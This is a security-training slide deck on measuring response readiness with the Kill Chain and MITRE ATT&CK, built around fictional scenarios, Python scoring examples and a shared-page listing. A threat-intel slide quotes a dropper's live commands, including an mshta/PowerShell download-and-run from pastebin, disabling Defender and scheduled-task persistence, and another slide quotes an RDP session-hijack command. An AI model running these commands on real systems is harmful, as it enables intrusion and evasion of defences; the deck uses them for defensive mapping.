How to measure your security response readiness?
Tomasz Jakubowski
@perunhimself
tomasz@shellsquad.com
Lockheed Martin Cyber Kill Chain® - recap
Source: Seven Ways to Apply the Cyber Kill Chain® with a Threat Intelligence Platform
https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.pdf
[Chart: Detection vs Closure. Bars per kill-chain phase (Recon, Weaponization, Delivery, Exploitation, Installation, C&C, Actions on objectives), two series: Detected and Closed, y-axis 0 to 60. Message: close the gap between what is detected and what is closed.]
MITRE ATT&CK™
• Website: https://attack.mitre.org
• Quote:
“MITRE ATT&CK™ is a globally-accessible knowledge base of
adversary tactics and techniques based on real-world observations.
The ATT&CK knowledge base is used as a foundation for the
development of specific threat models and methodologies in the
private sector, in government, and in the cybersecurity product and
service community.”
MITRE ATT&CK™
Tactics
• Answer WHY an action is performed by an adversary
• Provide useful context to individual techniques
Techniques
• Answer HOW an adversary achieves a tactical objective by performing an action (e.g. send a spearphishing email with an attachment to gain an initial foothold)
• Useful information for both red and blue teams
MITRE ATT&CK™
[Figure: Enterprise ATT&CK and PRE-ATT&CK mapped onto the adversary lifecycle]
Source: https://attack.mitre.org/theme/images/enterprise-pre-lifecycle.png
How to measure your security response readiness?
What is described
• Tactics (Enterprise: 12)
• Techniques (Enterprise: 266)
  • Description
  • Examples: groups and/or software using this technique
  • Mitigation
  • Detection
  • References
• Groups (94)
  • Description
  • Aliases
  • Techniques used
  • Software used
  • References
• Software (414)
  • Description
  • Techniques used
  • Groups using it
  • References
There are just too many techniques! Shortlist! e.g. Industry > Groups > Techniques
MITRE ATT&CK™ toolset
• MITRE ATT&CK™ Navigator
https://mitre-attack.github.io/attack-navigator/enterprise/
The “Target”
• Fictional company (or maybe not): https://www.sensenet-library.com
• Provides services available online
  • AI constructs: they just live in cyberspace, so it’s critical for them to be online!
  • Construct: a copy of consciousness allowing for immortal life in cyberspace
• Keeps confidential data on their internal network
  • You don’t want people breaking in and making copies of customers’ constructs
[Network diagram of the target. Components: INTERNET, ROUTER, two FIREWALLs, two SWITCHes, MAIL, WWW, PROXY, NIDS, NAV, DB, SIEM, SVR, USER1 to USER4. On host: FW, AV, IDS]
Warm-up: Detection and Containment (LM Cyber Kill Chain® countermeasures)
Columns: Detect | Deny | Disrupt | Degrade | Deceive | Contain
Reconnaissance: Firewall, Honeypot
Weaponization: NIPS
Delivery: (empty)
Exploitation: AV
Installation: (empty)
Command & Control: AV
Actions on Targets: (empty)
Completed: Detection and Containment (LM Cyber Kill Chain® countermeasures)
Columns: Detect | Deny | Disrupt | Degrade | Deceive | Contain (cells listed left to right)
Reconnaissance: Web Analytics, Web logs, Router Logs, NIDS, Firewall, Honeypot, Redirect Loop, Honeypot, Redirect Loops, Firewall
Weaponization: NIDS, NIPS, NIPS
Delivery: NIDS, HIDS, AV, Web Filter, Mail Filter, Inline AV, Mail Filter, Web Filter, Queuing, Sinkhole, Combination of Deny/Disrupt, Honeypot, App-Aware Firewall, Honeypot
Exploitation: HIDS, NIDS, AV, Patch, AV, HIPS, Patch, AV, HIPS, Highly restricted User Accounts, Honeypot, Inter-Zone NIPS
Installation: HIDS, Application Logs, AV, NetFlow, App Whitelisting, Blocked Execution, AV, HIPS, Combination of Deny/Disrupt, Honeypot
Command & Control: NIDS, HIDS, AV, Firewall, Sinkhole, NIPS, DEP, Sinkhole, Tarpit, Sinkhole, DNS Redirect, Sinkhole
Actions on Targets: Audit Logs, DEP, AV, NIDS, HIDS, Firewall, Network Segmentation, DLP, Network Segmentation, HIPS, Network Segmentation, Honeypot
Scenario 1: OMG! New vulnerability
• CVE-2029-0708 – Online Surrogate Service Remote Code Execution
• A remote code execution vulnerability exists in Online Surrogate Services when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target surrogate, which can lead to complete takeover of the surrogate.
• To exploit this vulnerability, an attacker would need to send a specially crafted request to the target surrogate’s Online Surrogate Service via RDP.
• The update addresses the vulnerability by correcting how Online Surrogate Services handles connection requests.
• You’ve checked: you have an old version of the software and you can’t patch right now due to some other dependencies that need to be sorted out first
Exploitability assessment:
Publicly Disclosed: Yes | Proof of Concept: Yes | Exploited: Yes | Latest Software Release: 4 – Not affected | Older Software Release: 1 – Exploitation More Likely | Denial of Service: No
Source: https://mitre-attack.github.io/attack-navigator/enterprise/
T1076: Remote Desktop Protocol
• Mitigation
  • Disable the RDP service if it is unnecessary
  • Remove unnecessary accounts and groups from the Remote Desktop Users group
  • Enable firewall rules to block RDP traffic between network security zones
  • Audit the Remote Desktop Users group membership regularly
  • Remove the local Administrators group from the list of groups allowed to log in through RDP
  • Limit remote user permissions if remote access is necessary
  • Use remote desktop gateways and multifactor authentication for remote logins
  • Do not leave RDP accessible from the internet
  • Change GPOs to define shorter session timeouts and the maximum amount of time any single session can be active
  • Change GPOs to specify the maximum amount of time that a disconnected session stays active on the RD session host server
• Detection
  • Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP
  • Monitor for user accounts logged into systems they would not normally access, or access patterns to multiple systems over a relatively short period of time
  • Set up process monitoring for tscon.exe usage and monitor service creation that uses cmd.exe /k or cmd.exe /c in its arguments to prevent RDP session hijacking (e.g. sc create sesshijack binpath= “cmd.exe /k tscon 4 /dest:console” followed by net start sesshijack)
https://attack.mitre.org/techniques/T1076/
Groups using it: 16 | Software using it: 8
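The two detection ideas in the T1076 entry above, implemented as an added example (this is not code from the slides or from MITRE): the first function flags accounts whose RDP logons (Windows Security event 4624, LogonType 10) fan out to more than a set number of distinct hosts inside a sliding time window, the second flags service installations (System event 7045) whose binary path runs tscon via cmd.exe /k or /c. The sample events are constructed, and the event IDs, the flat field names and the thresholds are assumptions about how a SIEM would normalise the logs.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not from the slides), already normalised to flat dicts:
# 4624 = successful logon (logon_type 10 is RemoteInteractive, i.e. RDP), 7045 = service installed.
SAMPLE_EVENTS = [
    {"time": "2019-06-01T08:00:00", "id": 4624, "host": "USER1", "user": "alice", "logon_type": 10},
    {"time": "2019-06-01T08:03:00", "id": 4624, "host": "USER2", "user": "alice", "logon_type": 10},
    {"time": "2019-06-01T08:05:00", "id": 4624, "host": "SVR",   "user": "alice", "logon_type": 10},
    {"time": "2019-06-01T08:07:00", "id": 4624, "host": "DB",    "user": "alice", "logon_type": 10},
    {"time": "2019-06-01T09:00:00", "id": 4624, "host": "USER3", "user": "bob",   "logon_type": 10},
    {"time": "2019-06-01T15:00:00", "id": 4624, "host": "USER4", "user": "bob",   "logon_type": 10},
    {"time": "2019-06-01T09:10:00", "id": 7045, "host": "SVR", "service": "sesshijack",
     "image_path": "cmd.exe /k tscon 4 /dest:console"},
    {"time": "2019-06-01T09:20:00", "id": 7045, "host": "USER3", "service": "backupagent",
     "image_path": r"C:\Program Files\Backup\agent.exe"},
]

# Service binary path that launches tscon through cmd.exe /k or /c (the pattern from the ATT&CK text).
TSCON_SERVICE = re.compile(r"cmd\.exe\s+/[kc]\b.*\btscon\b", re.IGNORECASE)


def fan_out_rdp_logons(events, max_hosts=3, window=timedelta(hours=1)):
    """Return {user: sorted hosts} for users with RDP logons to more than max_hosts
    distinct systems within any window-long period (the 'many systems, short time' pattern)."""
    per_user = defaultdict(list)
    for e in events:
        if e["id"] == 4624 and e.get("logon_type") == 10:
            per_user[e["user"]].append((datetime.fromisoformat(e["time"]), e["host"]))
    flagged = {}
    for user, logons in per_user.items():
        logons.sort()  # chronological, so every logon after index i is at or after t0
        for i, (t0, _) in enumerate(logons):
            hosts = {h for t, h in logons[i:] if t - t0 <= window}
            if len(hosts) > max_hosts:
                flagged[user] = sorted(hosts)
                break
    return flagged


def tscon_service_installs(events):
    """Return 7045 events whose service binary path runs tscon via cmd.exe /k or /c."""
    return [e for e in events if e["id"] == 7045 and TSCON_SERVICE.search(e.get("image_path", ""))]


if __name__ == "__main__":
    for user, hosts in fan_out_rdp_logons(SAMPLE_EVENTS).items():
        print(f"RDP fan-out: {user} reached {len(hosts)} hosts within an hour: {hosts}")
    for e in tscon_service_installs(SAMPLE_EVENTS):
        print(f"tscon service install on {e['host']}: {e['service']} -> {e['image_path']}")
```

Both functions return their findings rather than only printing them, so the same code can feed an alert rule or a test; the window and host threshold should be tuned per environment, since administrators who legitimately jump between many servers will otherwise dominate the results.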
Scenario 2: Threat Intel Report
• Multi-Stage Backdoor Dropper Document Possibly Targeting Online Services Vendors Observed
• 1st stage: after VBA macros are enabled, the Dropper Document executes mshta.exe with the following command line: mshta.exe http://www.tinyurl[.]com/shlsqd
• The referenced TinyURL address redirects to https://www.faild2ptch[.]com/oh/no.html, which provides URL-escaped JavaScript (JS) that performs the following actions:
  1. Removes OS Defender dynamic signatures using the following command line: MpCmdRun.exe -removedefinitions -dynamicsignatures
  2. Kills all open Office applications using the following command line: taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE
  3. Kills the OS Defender notification process using the command line: taskkill /f /im MSASCuiL.exe
  4. Disables unsafe files being opened in protected view by writing to one of the following registry paths: HKCU\Software\Microsoft\Office\[11-16].0\[Excel|Word|PowerPoint]\Security\ProtectedView\DisableUnsafeLocationsInPV
  5. Downloads and executes a remotely hosted .NET PE https://pastebin[.]com/raw/dhVymUy3 using PowerShell executed by mshta.exe with the following command line: mshta.exe vbscript:CreateObject(Wscript.Shell).Run(powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('h'+'t'+'t'+'p'+'s:'+'//p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m (window.close)
  6. Creates a registry run key under HKCU\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftUpdate with the following command line to execute a scheduled task every 100 minutes to download and execute a remote payload using mshta.exe: schtasks /create /sc MINUTE /mo 100 /tn "eScan Backup" /tr "mshta vbscript:CreateObject("Wscript.Shell").Run("mshta.exe https://pastebin[.]com/raw/df861P8c",0,true)(window.close)"" /F
Scenario 2: Threat Intel Report
Techniques mapped from the report:
• T1193: Spearphishing Attachment
• T1089: Disabling Security Tools
• T1170: Mshta
• T1481: Web Service
• T1053: Scheduled Task
• T1027: Obfuscated Files or Information
• T1064: Scripting
• T1086: PowerShell
• T1112: Modify Registry
How to measure your security response readiness?
Maturity
0 = We do nothing
1 = Locally logged: relevant data is captured on the endpoint
2 = Centrally logged: data is gathered centrally
3 = Correlated / enriched: logs for the event are enriched with data from other sources to increase fidelity
4 = Alerting: we have rules to detect anomalies and suspicious events
5 = Playbook exists: a process to respond exists (incl. analyse, contain, eradicate, recover)
6 = Response is automated: we have automated response for this alert
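The maturity scale above becomes useful once it is recorded per technique and turned into a readiness figure and a gap list. The following is an added example, not code from the slides: it scores the techniques mapped from the Scenario 2 report against the 0 to 6 scale, reports overall readiness as a share of the maximum, lists the techniques below a target level together with the next step each needs, and emits an ATT&CK Navigator layer that colours techniques by maturity. The per-technique levels are made-up sample values, and the Navigator layer keys follow the 4.x layer format as an assumption.

```python
import json

# The 0-6 response-maturity scale from the slides.
MATURITY = {
    0: "We do nothing",
    1: "Locally logged",
    2: "Centrally logged",
    3: "Correlated / enriched",
    4: "Alerting",
    5: "Playbook exists",
    6: "Response is automated",
}
MAX_LEVEL = max(MATURITY)

# Constructed self-assessment for the Scenario 2 techniques (levels are sample values, not from the slides).
ASSESSMENT = {
    "T1193": 4,  # Spearphishing Attachment
    "T1089": 1,  # Disabling Security Tools
    "T1170": 2,  # Mshta
    "T1053": 5,  # Scheduled Task
    "T1086": 3,  # PowerShell
    "T1112": 0,  # Modify Registry
}


def validate(assessment):
    """Reject levels that are not on the scale, so a typo cannot inflate the score."""
    bad = {t: lvl for t, lvl in assessment.items() if lvl not in MATURITY}
    if bad:
        raise ValueError(f"levels outside the 0-{MAX_LEVEL} scale: {bad}")


def readiness_percent(assessment):
    """Overall readiness as a percentage of the maximum attainable score."""
    validate(assessment)
    return round(100 * sum(assessment.values()) / (MAX_LEVEL * len(assessment)), 1)


def gaps(assessment, target=4):
    """Techniques below the target level, weakest first, each with the next step to take."""
    validate(assessment)
    below = [(t, lvl) for t, lvl in assessment.items() if lvl < target]
    return [(t, lvl, MATURITY[lvl + 1]) for t, lvl in sorted(below, key=lambda x: (x[1], x[0]))]


def navigator_layer(assessment, name="Response maturity"):
    """ATT&CK Navigator layer JSON scoring each technique by its maturity level.
    Assumption: the keys below follow the Navigator 4.x layer format; adjust for other versions."""
    validate(assessment)
    return json.dumps({
        "name": name,
        "versions": {"layer": "4.4"},
        "domain": "enterprise-attack",
        "techniques": [
            {"techniqueID": t, "score": lvl, "comment": MATURITY[lvl]}
            for t, lvl in sorted(assessment.items())
        ],
        "gradient": {"colors": ["#ff6666", "#ffe766", "#8ec843"],
                     "minValue": 0, "maxValue": MAX_LEVEL},
    }, indent=2)


if __name__ == "__main__":
    print(f"Readiness: {readiness_percent(ASSESSMENT)}%")
    for tech, lvl, next_step in gaps(ASSESSMENT):
        print(f"{tech}: level {lvl} ({MATURITY[lvl]}), next step: {next_step}")
    print(navigator_layer(ASSESSMENT))
```

The target level defaults to 4 (Alerting) because that is the first level at which an event can actually trigger a response; the same gap list with target 6 shows how far each technique is from automated response.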
Scenario 3: It’s all about the money
• There is an ongoing trade war between the two biggest economies in the world
• Unfortunately this has an impact on the wealthiest people, who are Sense//Net Library’s customers
• A few of them decided to put their AI constructs to sleep until better times come, hence your profits decrease
• The management decided it’s time to cut costs and your department needs to participate
• You don’t want to cut people (they are a great team), so you focus on vendor contracts that are going to be renewed this year: which security control can you afford to get rid of?
Measure effectiveness of the toolset
Rows: shortlisted MITRE ATT&CK techniques (T1193: Spearphishing Attachment, T1089: Disabling Security Tools, T1112: Modify Registry, T1086: PowerShell, T1053: Scheduled Task)
Columns: the current toolset (Tool1 to Tool8), grouped by the kill-chain phases each tool covers:
• Early warning: Reconnaissance
• Inbound Protect: Weaponization, Delivery
• Detect: Weaponization, Delivery, C2
• Outbound Protect: Exploit, Installation, C2, AOO
Source: Seven Ways to Apply the Cyber Kill Chain® with a Threat Intelligence Platform
https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.pdf
Scoring legend per column group:
• Early warning: [2] Would Warn of Activity, [0] N/A
• Inbound Protect: [2] Would Block Activity, [1] Could Block Activity, [0] Would Not Block Activity
• Detect: [2] Would Detect Activity, [0] No Detection or N/A
• Outbound Protect: [2] Would Block Outbound Traffic, [1] Could Have Blocked, [0] Would Not Block Activity
Measure effectiveness of the toolset: toolset measure for the current toolset
Column groups: Early warning (Reconnaissance) | Inbound Protect (Weaponization, Delivery) | Detect (Weaponization, Delivery, C2) | Outbound Protect (Exploit, Installation, C2, AOO)

Technique                        Tool1 Tool2 Tool3 Tool4 Tool5 Tool6 Tool7 Tool8 | Current Proposed
T1193: Spearphishing Attachment    0     0     2     1     2     0     2     1   |    8       7
T1089: Disabling Security Tools    2     0     0     2     2     0     2     1   |    9       8
T1112: Modify Registry             0     0     2     1     2     0     2     1   |    8       7
T1086: PowerShell                  2     0     0     2     2     0     2     1   |    9       8
T1053: Scheduled Task              2     0     2     1     0     2     2     1   |   10       7
Total                                                                            |   44      37
                                                                                 |  100%     84%
Scenario 4: Let’s go shopping
• Times are changing and the company profits picked up
• You successfully argued to get a bigger budget and now you can spend some money on a new security control
• Your team shortlisted a few vendors and you’ve conducted a PoC
• The results are that there are a few differences between the products
• The procurement team negotiated very similar prices for the products
Measure effectiveness of the toolset: current vs future toolset (toolset measure with a Proposed column)
Column groups: Early warning (Reconnaissance) | Inbound Protect (Weaponization, Delivery) | Detect (Weaponization, Delivery, C2) | Outbound Protect (Exploit, Installation, C2, AOO) | Proposed
Tools scored: Tool1, Tool3, Tool4, Tool5, Tool7 (kept after Scenario 3), plus candidates ToolA and ToolB

Technique                        Tool1 Tool3 Tool4 Tool5 Tool7 | ToolA ToolB | Current ProposedA ProposedB
T1193: Spearphishing Attachment    0     2     1     2     2   |   2     0   |    7        9         7
T1089: Disabling Security Tools    2     0     2     2     2   |   0     2   |    8        8        10
T1112: Modify Registry             0     2     1     2     2   |   2     0   |    7        9         7
T1086: PowerShell                  2     0     2     2     2   |   0     0   |    8        8         8
T1053: Scheduled Task              2     2     1     0     2   |   2     0   |    7        9         7
Total                                                           |             |   37       43        39
vs current toolset (37)                                         |             |  100%     116%      105%
vs Scenario 3 toolset (44)                                      |             |  100%      98%       89%
[2] Proposal Applicable
[0] N/A
Previous compared to
Proposed A and B
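The scoring behind the Scenario 3 and Scenario 4 tables, written out as an added example (this is the editor's code, not the author's spreadsheet): a technique-by-tool matrix with the slides' own 0/1/2 scores, a coverage function that sums only the tools in a given toolset, percentages against a baseline, a ranking of how many points each single tool's removal would cost, and a helper that adds a candidate product's column. The slides do not name the tools removed in Scenario 3; dropping Tool2, Tool6 and Tool8 is the only selection that reproduces the 37 shown, and the example uses that. ToolA and ToolB scores are taken from the Scenario 4 table.

```python
# Scores per shortlisted technique per tool, copied from the Scenario 3 table on the slides
# (0/1/2 as in the legend: would not / could / would block or detect).
SCORES = {
    "T1193": {"Tool1": 0, "Tool2": 0, "Tool3": 2, "Tool4": 1, "Tool5": 2, "Tool6": 0, "Tool7": 2, "Tool8": 1},
    "T1089": {"Tool1": 2, "Tool2": 0, "Tool3": 0, "Tool4": 2, "Tool5": 2, "Tool6": 0, "Tool7": 2, "Tool8": 1},
    "T1112": {"Tool1": 0, "Tool2": 0, "Tool3": 2, "Tool4": 1, "Tool5": 2, "Tool6": 0, "Tool7": 2, "Tool8": 1},
    "T1086": {"Tool1": 2, "Tool2": 0, "Tool3": 0, "Tool4": 2, "Tool5": 2, "Tool6": 0, "Tool7": 2, "Tool8": 1},
    "T1053": {"Tool1": 2, "Tool2": 0, "Tool3": 2, "Tool4": 1, "Tool5": 0, "Tool6": 2, "Tool7": 2, "Tool8": 1},
}
# Candidate products from Scenario 4, scored per technique (ToolA / ToolB columns on the slides).
CANDIDATES = {
    "ToolA": {"T1193": 2, "T1089": 0, "T1112": 2, "T1086": 0, "T1053": 2},
    "ToolB": {"T1193": 0, "T1089": 2, "T1112": 0, "T1086": 0, "T1053": 0},
}
ALL_TOOLS = list(SCORES["T1193"])
KEPT_TOOLS = ["Tool1", "Tool3", "Tool4", "Tool5", "Tool7"]  # Scenario 3 outcome (derived, see lead-in)


def coverage(scores, tools):
    """Per-technique scores and their total for a toolset; tools not listed contribute nothing."""
    per_tech = {t: sum(v for tool, v in row.items() if tool in tools) for t, row in scores.items()}
    return per_tech, sum(per_tech.values())


def percent(new_total, baseline_total):
    """Whole-number percentage of a total against a baseline, as shown on the slides."""
    return round(100 * new_total / baseline_total)


def with_candidate(scores, name, candidate):
    """Copy of the matrix extended with a candidate tool's column (missing techniques score 0)."""
    return {t: {**row, name: candidate.get(t, 0)} for t, row in scores.items()}


def rank_removals(scores, tools):
    """Scenario 3 helper: points lost by removing each single tool, cheapest removal first."""
    _, base = coverage(scores, tools)
    return sorted((base - coverage(scores, [x for x in tools if x != tool])[1], tool) for tool in tools)


def weakest_techniques(per_tech, n=2):
    """Techniques with the least coverage, so a purchase can be judged by what it fixes."""
    return sorted(per_tech, key=lambda t: (per_tech[t], t))[:n]


if __name__ == "__main__":
    _, before = coverage(SCORES, ALL_TOOLS)
    per_tech, after = coverage(SCORES, KEPT_TOOLS)
    print(f"Scenario 3: {before} -> {after} ({percent(after, before)}%); cheapest removals:",
          rank_removals(SCORES, ALL_TOOLS)[:3])
    print("Weakest techniques after the cut:", weakest_techniques(per_tech))
    for name, cand in CANDIDATES.items():
        _, total = coverage(with_candidate(SCORES, name, cand), KEPT_TOOLS + [name])
        print(f"Scenario 4 with {name}: {total} ({percent(total, after)}% of current, "
              f"{percent(total, before)}% of the original toolset)")
```

Two design points worth copying: the matrix is keyed by technique first, so re-shortlisting after a new threat intel report means adding rows, not reshaping the table; and every comparison is expressed against an explicit baseline, which is what makes the 116% of Scenario 4 and the 98% against the pre-cut toolset both readable from the same numbers.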
Other use cases
Source: https://attack.mitre.org/docs/attack_roadmap.pdf
Putting it all together
• Vulnerability reports
• Threat Intel reports
• Toolset effectiveness
• Response maturity
• ...

 
FIDO Munich Seminar: Securing Smart Car.pptx
FIDO Munich Seminar: Securing Smart Car.pptxFIDO Munich Seminar: Securing Smart Car.pptx
FIDO Munich Seminar: Securing Smart Car.pptx
FIDO Alliance
 
BCC -401-aktu-Cyber-Security Unit-1.docx
BCC -401-aktu-Cyber-Security Unit-1.docxBCC -401-aktu-Cyber-Security Unit-1.docx
BCC -401-aktu-Cyber-Security Unit-1.docx
pubgnewstate1620
 
FIDO Munich Seminar In-Vehicle Payment Trends.pptx
FIDO Munich Seminar In-Vehicle Payment Trends.pptxFIDO Munich Seminar In-Vehicle Payment Trends.pptx
FIDO Munich Seminar In-Vehicle Payment Trends.pptx
FIDO Alliance
 
FIDO Munich Seminar: Strong Workforce Authn Push & Pull Factors.pptx
FIDO Munich Seminar: Strong Workforce Authn Push & Pull Factors.pptxFIDO Munich Seminar: Strong Workforce Authn Push & Pull Factors.pptx
FIDO Munich Seminar: Strong Workforce Authn Push & Pull Factors.pptx
FIDO Alliance
 
Leading Bigcommerce Development Services for Online Retailers
Leading Bigcommerce Development Services for Online RetailersLeading Bigcommerce Development Services for Online Retailers
Leading Bigcommerce Development Services for Online Retailers
SynapseIndia
 
Blue Screen Of Death | Windows Down | Biggest IT failure
Blue Screen Of Death | Windows Down | Biggest IT failureBlue Screen Of Death | Windows Down | Biggest IT failure
Blue Screen Of Death | Windows Down | Biggest IT failure
Dexbytes Infotech Pvt Ltd
 

Recently uploaded (20)

Bài tập tiếng anh lớp 9 - Ôn tập tuyển sinh
Bài tập tiếng anh lớp 9 - Ôn tập tuyển sinhBài tập tiếng anh lớp 9 - Ôn tập tuyển sinh
Bài tập tiếng anh lớp 9 - Ôn tập tuyển sinh
 
SCREENING OF RECOMBINANTS - BLUE AND WHITE SCREENING (MCQS)
SCREENING OF RECOMBINANTS - BLUE AND WHITE SCREENING (MCQS)SCREENING OF RECOMBINANTS - BLUE AND WHITE SCREENING (MCQS)
SCREENING OF RECOMBINANTS - BLUE AND WHITE SCREENING (MCQS)
 
Epicor Kinetic REST API Services Overview.pptx
Epicor Kinetic REST API Services Overview.pptxEpicor Kinetic REST API Services Overview.pptx
Epicor Kinetic REST API Services Overview.pptx
 
Generative AI technology is a fascinating field that focuses on creating comp...
Generative AI technology is a fascinating field that focuses on creating comp...Generative AI technology is a fascinating field that focuses on creating comp...
Generative AI technology is a fascinating field that focuses on creating comp...
 
Mega MUG 2024: Working smarter in Marketo
Mega MUG 2024: Working smarter in MarketoMega MUG 2024: Working smarter in Marketo
Mega MUG 2024: Working smarter in Marketo
 
FIDO Munich Seminar Workforce Authentication Case Study.pptx
FIDO Munich Seminar Workforce Authentication Case Study.pptxFIDO Munich Seminar Workforce Authentication Case Study.pptx
FIDO Munich Seminar Workforce Authentication Case Study.pptx
 
Using ScyllaDB for Real-Time Write-Heavy Workloads
Using ScyllaDB for Real-Time Write-Heavy WorkloadsUsing ScyllaDB for Real-Time Write-Heavy Workloads
Using ScyllaDB for Real-Time Write-Heavy Workloads
 
Top keywords searches on business in AUS
Top keywords searches on business in AUSTop keywords searches on business in AUS
Top keywords searches on business in AUS
 
Flame Atomic Emission Spectroscopy.-pptx
Flame Atomic Emission Spectroscopy.-pptxFlame Atomic Emission Spectroscopy.-pptx
Flame Atomic Emission Spectroscopy.-pptx
 
Network Auto Configuration and Correction using Python.pptx
Network Auto Configuration and Correction using Python.pptxNetwork Auto Configuration and Correction using Python.pptx
Network Auto Configuration and Correction using Python.pptx
 
UiPath Community Day Amsterdam presentations
UiPath Community Day Amsterdam presentationsUiPath Community Day Amsterdam presentations
UiPath Community Day Amsterdam presentations
 
Understanding NFT Marketplace Ecosystem.pptx
Understanding  NFT Marketplace Ecosystem.pptxUnderstanding  NFT Marketplace Ecosystem.pptx
Understanding NFT Marketplace Ecosystem.pptx
 
Indian Privacy law & Infosec for Startups
Indian Privacy law & Infosec for StartupsIndian Privacy law & Infosec for Startups
Indian Privacy law & Infosec for Startups
 
The learners analyze the various sectors of ICT and evaluate the potential ca...
The learners analyze the various sectors of ICT and evaluate the potential ca...The learners analyze the various sectors of ICT and evaluate the potential ca...
The learners analyze the various sectors of ICT and evaluate the potential ca...
 
FIDO Munich Seminar: Securing Smart Car.pptx
FIDO Munich Seminar: Securing Smart Car.pptxFIDO Munich Seminar: Securing Smart Car.pptx
FIDO Munich Seminar: Securing Smart Car.pptx
 
BCC -401-aktu-Cyber-Security Unit-1.docx
BCC -401-aktu-Cyber-Security Unit-1.docxBCC -401-aktu-Cyber-Security Unit-1.docx
BCC -401-aktu-Cyber-Security Unit-1.docx
 
FIDO Munich Seminar In-Vehicle Payment Trends.pptx
FIDO Munich Seminar In-Vehicle Payment Trends.pptxFIDO Munich Seminar In-Vehicle Payment Trends.pptx
FIDO Munich Seminar In-Vehicle Payment Trends.pptx
 
FIDO Munich Seminar: Strong Workforce Authn Push & Pull Factors.pptx
FIDO Munich Seminar: Strong Workforce Authn Push & Pull Factors.pptxFIDO Munich Seminar: Strong Workforce Authn Push & Pull Factors.pptx
FIDO Munich Seminar: Strong Workforce Authn Push & Pull Factors.pptx
 
Leading Bigcommerce Development Services for Online Retailers
Leading Bigcommerce Development Services for Online RetailersLeading Bigcommerce Development Services for Online Retailers
Leading Bigcommerce Development Services for Online Retailers
 
Blue Screen Of Death | Windows Down | Biggest IT failure
Blue Screen Of Death | Windows Down | Biggest IT failureBlue Screen Of Death | Windows Down | Biggest IT failure
Blue Screen Of Death | Windows Down | Biggest IT failure
 

How to measure your security response readiness?

• 1. How to measure your security response readiness?
  Tomasz Jakubowski
  @perunhimself
  tomasz@shellsquad.com
• 2. Lockheed Martin Cyber Kill Chain® - recap
  Source: Seven Ways to Apply the Cyber Kill Chain® with a Threat Intelligence Platform
  https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.pdf
• 3. Detection vs Closure
  (Bar chart, scale 0 to 60, of Detected vs Closed per kill chain phase: Recon, Weaponization, Delivery, Exploitation, Installation, C&C, Actions on objectives.)
  Close the gap
• 4. MITRE ATT&CK™
  • Website: https://attack.mitre.org
  • Quote: “MITRE ATT&CK™ is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. The ATT&CK knowledge base is used as a foundation for the development of specific threat models and methodologies in the private sector, in government, and in the cybersecurity product and service community.”
• 5. MITRE ATT&CK™
  Tactics
  • Answer WHY an action is performed by an adversary
  • Provide useful context to individual techniques
  Techniques
  • Answer HOW an adversary achieves a tactical objective by performing an action (e.g. send a spearphishing email with an attachment to gain an initial foothold)
  • Useful information for both red and blue teams
• 6. MITRE ATT&CK™
  Source: https://attack.mitre.org/theme/images/enterprise-pre-lifecycle.png
• 8. What is described
  • Tactics (E: 12)
  • Techniques (E: 266): Description; Examples: Groups and/or software using this technique; Mitigation; Detection; References
  • Groups (94): Description; Aliases; Techniques used; Software used; References
  • Software (414): Description; Techniques used; Groups using it; References
• 9. There are just too many techniques! Shortlist! e.g. Industry > Groups > Techniques
• 10. MITRE ATT&CK™ toolset
  • MITRE ATT&CK™ Navigator: https://mitre-attack.github.io/attack-navigator/enterprise/
• 11. The “Target”
  • Fictional company (or maybe not): https://www.sensenet-library.com
  • Provides services available online
  • AI constructs – they just live in cyberspace – it’s critical for them to be online!
  • Construct – a copy of consciousness allowing for immortal life in cyberspace
  • Keeps confidential data on their internal network
  • You don’t want people breaking in and making copies of customers’ constructs
• 13. Warm-up: Detection and Containment Phase (LM Cyber Kill Chain® Countermeasures)
  Columns: Detect | Deny | Disrupt | Degrade | Deceive | Contain
  • Reconnaissance: Firewall, Honeypot
  • Weaponization: NIPS
  • Delivery: (blank)
  • Exploitation: AV
  • Installation: (blank)
  • Command & Control: AV
  • Actions on Targets: (blank)
• 14. Completed: Detection and Containment Phase (LM Cyber Kill Chain® Countermeasures)
  Columns: Detect | Deny | Disrupt | Degrade | Deceive | Contain; countermeasures per phase, in slide order:
  • Reconnaissance: Web Analytics, Web logs, Router Logs, NIDS, Firewall, Honeypot Redirect Loop, Honeypot Redirect Loops, Firewall
  • Weaponization: NIDS, NIPS, NIPS
  • Delivery: NIDS, HIDS, AV, Web Filter, Mail Filter, Inline AV, Mail Filter, Web Filter, Queuing, Sinkhole, Combination of Deny/Disrupt, Honeypot, App-Aware Firewall, Honeypot
  • Exploitation: HIDS, NIDS, AV, Patch, AV, HIPS, Patch, AV, HIPS, Highly restricted User Accounts, Honeypot, Inter-Zone NIPS
  • Installation: HIDS, Application Logs, AV, NetFlow, App Whitelisting, Blocked Execution, AV, HIPS, Combination of Deny/Disrupt, Honeypot
  • Command & Control: NIDS, HIDS, AV, Firewall, Sinkhole, NIPS, DEP, Sinkhole, Tarpit, Sinkhole, DNS Redirect, Sinkhole
  • Actions on Targets: Audit Logs, DEP, AV, NIDS, HIDS, Firewall, Network Segmentation, DLP, Network Segmentation, HIPS, Network Segmentation, Honeypot
• 15. Scenario 1: OMG! New vulnerability
  • CVE-2029-0708 – Online Surrogate Service Remote Code Execution
